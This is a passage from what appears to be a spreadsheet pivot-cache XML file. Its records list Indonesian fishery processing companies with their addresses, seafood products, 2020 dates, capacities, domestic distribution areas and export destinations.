    <s v="Kota Surabaya"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="22201"/>
    <x v="643"/>
    <s v="PT. ABADI PERMAI"/>
    <s v="Jl. Timor Timur No.5 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering "/>
    <d v="2020-11-09T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Tegal"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="22202"/>
    <x v="643"/>
    <s v="PT. ABADI PERMAI"/>
    <s v="Jl. Timor Timur No.5 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-11-09T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="22203"/>
    <x v="643"/>
    <s v="PT. ABADI PERMAI"/>
    <s v="Jl. Timor Timur No.5 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Teripang Kering"/>
    <d v="2020-11-09T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Surabaya"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="22205"/>
    <x v="644"/>
    <s v="PT. MADSUMAYA INDO SEAFOOD"/>
    <s v="Jl. Kawasan Industri Gresik Kav C8 No.15, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-11-23T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="France, Japan, United States"/>
  </r>
  <r>
    <n v="22206"/>
    <x v="644"/>
    <s v="PT. MADSUMAYA INDO SEAFOOD"/>
    <s v="Jl. Kawasan Industri Gresik Kav C8 No.15, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-11-23T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="France, Japan, United States"/>
  </r>
  <r>
    <n v="22207"/>
    <x v="645"/>
    <s v="PT. MULIA PERIKANAN INDONESIA"/>
    <s v="Jl. Yos Sudarso Komplek PPI Dulanpokpok, Kel. Dulanpokpok, Kec. Pariwari, Kabupaten Fakfak&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="22208"/>
    <x v="645"/>
    <s v="PT. MULIA PERIKANAN INDONESIA"/>
    <s v="Jl. Yos Sudarso Komplek PPI Dulanpokpok, Kel. Dulanpokpok, Kec. Pariwari, Kabupaten Fakfak&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap, Layur)"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="22209"/>
    <x v="645"/>
    <s v="PT. MULIA PERIKANAN INDONESIA"/>
    <s v="Jl. Yos Sudarso Komplek PPI Dulanpokpok, Kel. Dulanpokpok, Kec. Pariwari, Kabupaten Fakfak&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Hong Kong"/>
  </r>
  <r>
    <n v="22210"/>
    <x v="645"/>
    <s v="PT. MULIA PERIKANAN INDONESIA"/>
    <s v="Jl. Yos Sudarso Komplek PPI Dulanpokpok, Kel. Dulanpokpok, Kec. Pariwari, Kabupaten Fakfak&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Hong Kong, Thailand"/>
  </r>
  <r>
    <n v="22211"/>
    <x v="645"/>
    <s v="PT. MULIA PERIKANAN INDONESIA"/>
    <s v="Jl. Yos Sudarso Komplek PPI Dulanpokpok, Kel. Dulanpokpok, Kec. Pariwari, Kabupaten Fakfak&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Udang Beku"/>
    <d v="2020-09-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Hong Kong, Thailand"/>
  </r>
  <r>
    <n v="22221"/>
    <x v="646"/>
    <s v="PT. INDO MINA GRASIA"/>
    <s v="Jl. Sagerat Tanjung Merah Lingkungan III, Kel. Tanjung Merah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Panni, Tongkol, Malalugis, Maesang, Layang, Cakalang)"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Utara, Kota Bitung"/>
    <m/>
  </r>
  <r>
    <n v="22222"/>
    <x v="647"/>
    <s v="PT. DARWIN KARINDO MANDIRI"/>
    <s v="Komplek Union Industrial Park Blok I No.08, Kel. Tanjung Sengkuang, Kec. Batu Ampar, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Mata Besar, Tongkol, Kembung, Selar, Layang, Tenggiri)"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="22223"/>
    <x v="647"/>
    <s v="PT. DARWIN KARINDO MANDIRI"/>
    <s v="Komplek Union Industrial Park Blok I No.08, Kel. Tanjung Sengkuang, Kec. Batu Ampar, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Manyung, Kerapu, Bawal, Kakap)"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Natuna"/>
    <m/>
  </r>
  <r>
    <n v="22224"/>
    <x v="647"/>
    <s v="PT. DARWIN KARINDO MANDIRI"/>
    <s v="Komplek Union Industrial Park Blok I No.08, Kel. Tanjung Sengkuang, Kec. Batu Ampar, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="22225"/>
    <x v="648"/>
    <s v="UD. MINA CENDRAWASIH BAHARI"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Beku (Barramundi, Bawal, Lencam, Kakap)"/>
    <d v="2020-10-05T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22226"/>
    <x v="648"/>
    <s v="UD. MINA CENDRAWASIH BAHARI"/>
    <s v="Jl. Cakalang Kompleks Pelabuhan Perikanan Pantai Sorong, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-10-05T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22227"/>
    <x v="353"/>
    <s v="PT. AGB PALABUHANRATU"/>
    <s v="Jl. Siliwangi Pelabuhan Perikanan Nusantara, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Layur)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22228"/>
    <x v="649"/>
    <s v="BORKAT MANIAN"/>
    <s v="Air Bungkeh, Jorong Bahagia, Kel. Panti Utara, Kec. Panti, Kabupaten Pasaman&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Abon Ikan"/>
    <d v="2020-09-10T00:00:00"/>
    <n v="400"/>
    <s v="Kabupaten Pasaman, Kabupaten Pasaman Barat, Kota Padang, Kota Bukittinggi, Kota Payakumbuh"/>
    <m/>
  </r>
  <r>
    <n v="22229"/>
    <x v="650"/>
    <s v="PT. MEDIKOS INDUSTRIES"/>
    <s v="Jl. Rengas No.1529 RT 021 RW 005, Kel. 20 Ilir, Kec. Ilir Timur II, Kota Palembang&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Belut Hidup"/>
    <d v="2020-10-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22230"/>
    <x v="649"/>
    <s v="BORKAT MANIAN"/>
    <s v="Air Bungkeh, Jorong Bahagia, Kel. Panti Utara, Kec. Panti, Kabupaten Pasaman&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Nila Krispy"/>
    <d v="2020-09-10T00:00:00"/>
    <n v="500"/>
    <s v="Kabupaten Pasaman, Kabupaten Pasaman Barat, Kota Padang, Kota Bukittinggi, Kota Payakumbuh"/>
    <m/>
  </r>
  <r>
    <n v="22231"/>
    <x v="651"/>
    <s v="CV. ANUGRAH LESTARI"/>
    <s v="Jl. Pendidikan, Kunjung Mae, Kel. Bonto Lanra, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="2000000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="American Samoa, Australia, China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="22232"/>
    <x v="651"/>
    <s v="CV. ANUGRAH LESTARI"/>
    <s v="Jl. Pendidikan, Kunjung Mae, Kel. Bonto Lanra, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Daging Kerang Kering"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="American Samoa, Australia, China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="22233"/>
    <x v="651"/>
    <s v="CV. ANUGRAH LESTARI"/>
    <s v="Jl. Pendidikan, Kunjung Mae, Kel. Bonto Lanra, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="American Samoa, Australia, China, Hong Kong, Italy, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="22234"/>
    <x v="652"/>
    <s v="PT. BERKAH MARITIM SENTOSA"/>
    <s v="Jl. Tuna Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Deho, Kembung, Lemadang, Meka, Gindara, Salem, Muroaji, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="800000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Depok, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22235"/>
    <x v="652"/>
    <s v="PT. BERKAH MARITIM SENTOSA"/>
    <s v="Jl. Tuna Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22236"/>
    <x v="652"/>
    <s v="PT. BERKAH MARITIM SENTOSA"/>
    <s v="Jl. Tuna Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Kuwe, Kerapu, Remang, Bawal, Kakap, Kurisi, Selar Kuning, Ekor Kuning, Barramundi)"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22237"/>
    <x v="652"/>
    <s v="PT. BERKAH MARITIM SENTOSA"/>
    <s v="Jl. Tuna Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22238"/>
    <x v="652"/>
    <s v="PT. BERKAH MARITIM SENTOSA"/>
    <s v="Jl. Tuna Blok L No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="22239"/>
    <x v="653"/>
    <s v="PT. BEHN MEYER CHEMICALS"/>
    <s v="Taman Tekno BSD Industrial Komplek Sektor XI, Jl. Tekno Utama Blok B No.1, Kel. Setu, Kec. Setu, Kota Tangerang Selatan&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Flakes Rumput Laut"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Sukabumi"/>
    <m/>
  </r>
  <r>
    <n v="22240"/>
    <x v="653"/>
    <s v="PT. BEHN MEYER CHEMICALS"/>
    <s v="Taman Tekno BSD Industrial Komplek Sektor XI, Jl. Tekno Utama Blok B No.1, Kel. Setu, Kec. Setu, Kota Tangerang Selatan&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tepung Karagenan (Milkvis, Aquagel, Aquavis), Tepung Alginat (FibroTec)"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Barat"/>
    <m/>
  </r>
  <r>
    <n v="22242"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Beku (Swanggi, Sebelah, Manyung, Kerapu, Layur, Bawal, Kakap)"/>
    <d v="2020-11-04T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Medan, Kota Jambi, Kota Surabaya"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22243"/>
    <x v="654"/>
    <s v="PT. GALIC ARTABAHARI"/>
    <s v="Kp. Cikedokan RT 002 RW 001, Kel. Sukadanau, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Semi Refined Carrageenan"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="1200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Karawang, Kabupaten Bekasi, Kota Semarang, Kabupaten Pasuruan, Kabupaten Mojokerto, Kabupaten Jombang"/>
    <s v="Australia, France, Germany, New Zealand, Thailand, United States"/>
  </r>
  <r>
    <n v="22244"/>
    <x v="655"/>
    <s v="PLANT III PT. TRI MITRA MAKMUR"/>
    <s v="Jl. Pantura Km 9,5, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-11-11T00:00:00"/>
    <n v="672000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22245"/>
    <x v="655"/>
    <s v="PLANT III PT. TRI MITRA MAKMUR"/>
    <s v="Jl. Pantura Km 9,5, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-11-11T00:00:00"/>
    <n v="210000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22246"/>
    <x v="655"/>
    <s v="PLANT III PT. TRI MITRA MAKMUR"/>
    <s v="Jl. Pantura Km 9,5, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-11-11T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="22247"/>
    <x v="656"/>
    <s v="PT. SEKAR BUMI, TBK PLANT II"/>
    <s v="Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Belgium, Netherlands, United Kingdom"/>
  </r>
  <r>
    <n v="22248"/>
    <x v="656"/>
    <s v="PT. SEKAR BUMI, TBK PLANT II"/>
    <s v="Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Masak Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Belgium, Netherlands, United Kingdom"/>
  </r>
  <r>
    <n v="22249"/>
    <x v="656"/>
    <s v="PT. SEKAR BUMI, TBK PLANT II"/>
    <s v="Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Belgium, Netherlands"/>
  </r>
  <r>
    <n v="22250"/>
    <x v="656"/>
    <s v="PT. SEKAR BUMI, TBK PLANT II"/>
    <s v="Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Rebus Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Belgium, Netherlands"/>
  </r>
  <r>
    <n v="22251"/>
    <x v="656"/>
    <s v="PT. SEKAR BUMI, TBK PLANT II"/>
    <s v="Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Belut, Gurame, Bandeng)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Belgium, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="22252"/>
    <x v="149"/>
    <s v="PT. SEKAR BUMI, TBK PLANT I"/>
    <s v="Jl. Raya Tebel, Kel. Tebel, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Paha Kodok Beku"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Belgium, France, Korea, Democratic People's Republic of, Netherlands"/>
  </r>
  <r>
    <n v="22253"/>
    <x v="657"/>
    <s v="PT. CANDI JAYA AMERTA"/>
    <s v="Jl. Raya Tanggulangin No.36, Kel. Kalitengah, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Udang"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="384000"/>
    <m/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="22254"/>
    <x v="657"/>
    <s v="PT. CANDI JAYA AMERTA"/>
    <s v="Jl. Raya Tanggulangin No.36, Kel. Kalitengah, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Ikan"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22255"/>
    <x v="657"/>
    <s v="PT. CANDI JAYA AMERTA"/>
    <s v="Jl. Raya Tanggulangin No.36, Kel. Kalitengah, Kec. Tanggulangin, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Campuran Ikan dan Udang"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22256"/>
    <x v="563"/>
    <s v="PT. HASIL ALAM SAMUDERA"/>
    <s v="Jl. Muara Baru Ujung Blok D/6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kota Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="22257"/>
    <x v="658"/>
    <s v="SEMANGAT BARU"/>
    <s v="Jl. Garuda LK IV, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="2000000"/>
    <s v="Kota Medan"/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="22264"/>
    <x v="658"/>
    <s v="SEMANGAT BARU"/>
    <s v="Jl. Garuda LK IV, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Kering"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan"/>
    <s v="China, Malaysia, Thailand"/>
  </r>
  <r>
    <n v="22266"/>
    <x v="659"/>
    <s v="PT. SARANA MARITIM MANDIRI"/>
    <s v="Jl. Nangka Komplek Bukit Merah RT 002 RW 001, Kel. Harjosari, Kec. Tebing, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-10-23T00:00:00"/>
    <n v="1200"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22267"/>
    <x v="660"/>
    <s v="PT. BARUNA ABADI PERKASA"/>
    <s v="Jl. Kusuma Bangsa No.18, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Barakuda, Tude, Bonito, Tongkol)"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Pekalongan, Kota Surabaya"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22268"/>
    <x v="660"/>
    <s v="PT. BARUNA ABADI PERKASA"/>
    <s v="Jl. Kusuma Bangsa No.18, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Bawal, Bunak, Swanggi, Gulama, Lencam, Kambing-Kambing)"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Pekalongan, Kota Surabaya"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22269"/>
    <x v="660"/>
    <s v="PT. BARUNA ABADI PERKASA"/>
    <s v="Jl. Kusuma Bangsa No.18, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Surabaya"/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="22270"/>
    <x v="660"/>
    <s v="PT. BARUNA ABADI PERKASA"/>
    <s v="Jl. Kusuma Bangsa No.18, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Surabaya"/>
    <s v="China, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="22271"/>
    <x v="661"/>
    <s v="PT. JALA SEMBILAN"/>
    <s v="Kawasan Industri Wijayakusuma Jl. Tugu Industri IV No.3, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Segar (Swanggi, Malong, Gulama, Lencam, Anggoli, Kerapu)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="22272"/>
    <x v="661"/>
    <s v="PT. JALA SEMBILAN"/>
    <s v="Kawasan Industri Wijayakusuma Jl. Tugu Industri IV No.3, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Kembung, Lemadang, Marlin, Cakalang)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="22273"/>
    <x v="661"/>
    <s v="PT. JALA SEMBILAN"/>
    <s v="Kawasan Industri Wijayakusuma Jl. Tugu Industri IV No.3, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="22274"/>
    <x v="661"/>
    <s v="PT. JALA SEMBILAN"/>
    <s v="Kawasan Industri Wijayakusuma Jl. Tugu Industri IV No.3, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="22275"/>
    <x v="661"/>
    <s v="PT. JALA SEMBILAN"/>
    <s v="Kawasan Industri Wijayakusuma Jl. Tugu Industri IV No.3, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-02T00:00:00"/>
    <n v="300000"/>
    <m/>
